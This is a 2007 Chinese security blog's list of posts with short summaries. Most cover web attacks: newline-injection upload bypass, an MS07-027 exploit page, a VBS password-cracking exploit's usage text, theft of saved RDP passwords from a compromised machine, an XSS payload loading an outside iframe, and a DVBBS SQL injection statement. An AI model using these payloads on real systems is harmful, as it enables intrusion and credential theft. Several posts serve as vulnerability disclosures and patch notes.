2007年6月29日
摘要: 以通过这个正则表达式但是带入一个%0a,那么很好,漏洞就回到一个%0a能做什么上来了! 黑锅已经总结了一个,在文件扩展后缀里 1.php.jpg不能执行但是 1.php.jpg%0a就可以了(linux环境下) 另外如果在写文件的时候%0a就是一个新行了,对于数据库为文本的就是一个新记录 还有呢?数据库在对待1和1%a的时候是不一样的,1%a被更新到一个int类型的字段可能会导致溢出 ... 阅读全文
posted @ 2007-06-29 14:05 %5C 阅读(5742) 评论(0) 推荐(1) 编辑
摘要: Windows 2003版本区别1)Windows Server 2003, Standard Edition (标准版)针对中小型企业的核心产品,他也是支持双路处理器,4GB的内存。它除了具备 Windows Server 2003 Web Edition 所有功能外,还支持像证书服务、UDDI服务、传真服务、IAS因特网验证服务、可移动存储、RIS、智能卡、终端服务、WMS和 Services... 阅读全文
posted @ 2007-06-29 13:41 %5C 阅读(411) 评论(0) 推荐(0) 编辑
  2007年6月28日
摘要: http://cctmv.com/Browser it And See IT -------------------------------------------Index.htm----------------------------------- FlstX MS07-027 Oday ---------------------------------------------------... 阅读全文
posted @ 2007-06-28 22:27 %5C 阅读(303) 评论(0) 推荐(0) 编辑
摘要: exp如下 '============================================================================'使用说明:' 在命令提示符下:' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 有效的文章id 要破解的博客用户密码'如:' cscript.exe lbsblog.vbs www.xxxx.com/blo... 阅读全文
posted @ 2007-06-28 22:09 %5C 阅读(354) 评论(0) 推荐(0) 编辑
摘要: 几天前费了不少力气拿到一管理员机器,主站我盘旋了很久,没有突破口,开了80,还有一个高端端口,当然就是3389了,一阵欣喜,管理员一定会登这个服务器的3389的。现在机器是拿到了,翻了翻管理员机器里的东西,本来想装键盘记录的,发现有很多以ip命名的rdp文件,下了一个下回来打开看了一下,真幸运,保存了密码在rdp文件里的(这种情况只有读rdp的密码了,键盘记录记不到)。主站和各分站的3389都是以... 阅读全文
posted @ 2007-06-28 13:54 %5C 阅读(333) 评论(1) 推荐(0) 编辑
摘要: 1、连接SQL*Plus system/manager2、显示当前连接用户SQL> show user3、查看系统拥有哪些用户SQL> select * from all_users;4、新建用户并授权SQL> create user a identified by a;(默认建在SYSTEM表空间下)SQL> grant connect,resource to a;5、连接到新用户SQL> co... 阅读全文
posted @ 2007-06-28 13:52 %5C 阅读(820) 评论(0) 推荐(0) 编辑
  2007年6月27日
摘要: 跨站漏洞成功演示代码: [font=expression(container.document.write(unescape('%3Ciframe%20src%3D%27http%3A//www.godx.cn%27%3E%3C/iframe%3E')))]God[/font] 对策。。。屏蔽关键字如果不用屏蔽关键字的办法, 则使用下面的办法修补漏洞用记事本打开 guestbook.asp 查找... 阅读全文
posted @ 2007-06-27 10:33 %5C 阅读(388) 评论(0) 推荐(0) 编辑
  2007年6月26日
摘要: 注意:这只是个漏洞公告并不是通常意义的原创,因此以执行帐号发布。感谢碎片、老周、ring04h等成员的讨论。邪恶八进制信息安全团队已经将该漏洞提交给PHPWind官方。PHPWind Forums v5.3 postupload.php Cross Site Script(XSS)PHPWind论坛5.3版postupload.php文件跨站脚本漏洞(XSS)漏洞产生:require\postup... 阅读全文
posted @ 2007-06-26 14:57 %5C 阅读(1142) 评论(0) 推荐(0) 编辑
摘要: 声明:本文乃提供脚本学习 不是为了让大家去黑更多的站而写 漏洞已修补 网上的已经没有有漏洞的站了影响版本:oblog4.5 商业SQL (非Final版)漏洞补丁地址:http://down.oblog.cn/oblog4/patch/Oblog45_Final_Patch0619.rar漏洞文件:api/API_Response.asp打开api/API_Response.asp看开头处====... 阅读全文
posted @ 2007-06-26 14:55 %5C 阅读(192) 评论(0) 推荐(0) 编辑
  2007年6月25日
摘要: 对SQL版的动网7.1系统。开放了博客功能登陆http://bbs.xxx.com/bokeindex.asp点“博客管理” 登陆后在点 关键字设置在“链接地址”处写上动网sql注入语句例: 123123'where 1=0;update dv_user set userface=(select top 1 username from dv_user where usercla... 阅读全文
posted @ 2007-06-25 03:05 %5C 阅读(331) 评论(0) 推荐(0) 编辑